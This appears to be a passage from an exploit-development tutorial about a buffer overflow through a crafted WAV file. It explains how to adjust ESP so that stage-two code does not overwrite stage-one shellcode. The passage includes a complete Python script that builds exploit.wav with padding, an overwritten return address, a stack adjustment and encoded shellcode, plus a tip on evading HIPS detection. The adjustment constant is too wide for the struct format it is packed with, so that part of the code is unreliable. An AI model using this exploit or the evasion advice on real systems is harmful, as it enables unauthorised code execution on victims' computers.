We showed that the code execution failed in mid-exploit because our stage two clobbered our stage one code in memory. So, we need more stack space to complete this exploit. We can either split our code up in memory if necessary or we can simply expand the space in the stack.
This is done by telling the system to add space to the ESP. You can do this in one of two ways: by adding negative space or subtracting positive space. The reason for this is because the stack grows from high address to low addresses as we mentioned earlier.
So, we see that we are clobbering the shellcode with this exploit, so we can compensate instead by telling the ESP to move to accommodate the necessary space.
To do this, we need to add a hexadecimal adjustment to the front of the shellcode. We are going to do this in two different ways. The first way we will highlight in this section. We will then explain the second manner of doing it as we reverse Metasploit payloads. First we need to figure out how to adjust the actual stack; we can do this with the nasm_shell.rb in the /usr/share/metasploit-framework/tools/nasm_shell.rb
.
Stack adjustment of 80,000 means we are adding this value to the ESP. To do that, we need to calculate the ESP adjustment for 80,000, but for that calculation we need to change 80,000 to a hexadecimal value. The hexadecimal equivalent is 13880.
This means we add the following code to our exploit to adjust the stack adjustment = struct.pack('<I',0x81EC80380100)
. We then prepend the shellcode with the adjustment value exploit = fill + eip + offset + adjustment + shell
. Finally, we remove our NOP sled, since this is not filling space that our secondary stage will encompass, the final code would be similar to this.
#!/usr/bin/env python import struct filename="exploit.wav" fill ="A"*4112 eip = struct.pack('<I',0x7C874413) offset = "x90"*10 available_shellcode_space = 320 adjustment = struct.pack('<I',0x81EC80380100) shell =("xbax16xdfx1bx5dxd9xf6xd9x74x24xf4x5ex31xc9xb1" "x2dx31x56x13x83xc6x04x03x56x19x3dxeexa1x4fx2a" "x56xb2x76x53xa6xbdxe8x9dx82xc9x95xe1xbfxb2x58" "x62xc1xa5x29xc5xe1x38xc7x61xd5xa0x16x98x27x15" "x81xc8x89x5fxbcx11xc8xe4x7ex64x3axa7x18xbex08" "x5dx07x8bx07xd1xe3x0dxf1x88x60x11x58xdex39x36" "x5bx09xc6x6axc2x40xa4x56xe8x33xcbx77x21x6fx57" "xf3x01xbfx1cx43x8ax34x52x58x3fxc1xfax68x61xb0" "xa9x0exf5x0fx7fxa7x72x03x4dx68x29x85x08xe4xb1" "xb6xbcx9cx61x1ax13xccxc6xcfxd0xa1x41x08xb0xc4" "xbdxdfx3ex90x12x86x87xf9x4axb9x21x63xccxeexa2" "x93xf8x78x54xacxadx44x0dx4axc6x4bxf6xf5x45xc5" "xebx90x79x86xbcx02xc3x7fx47x34xe5xd0xf3xc6x5a" "x82xacx85x3cx9dx92x12x3ex3b") exploit = fill + eip + offset +adjustment + shell open('exploit.wav', 'w').close() writeFile = open (filename, "w") writeFile.write(exploit) writeFile.close()
There is a problem with this method though. If your stack adjustment has bad characters in it you would need to eliminate those by encoding it. Since you are not usually modifying your stack adjustment at a later point, you can make it part of your shell and encode the entire block of code. We will go through that process when we reverse a Metasploit module.
As a side benefit, if we do this method instead of using NOP sleds, it is less likely that the exploit will be caught by HIPS. Now that we have done all that, realize there is an easier way to gain access using a standard payload.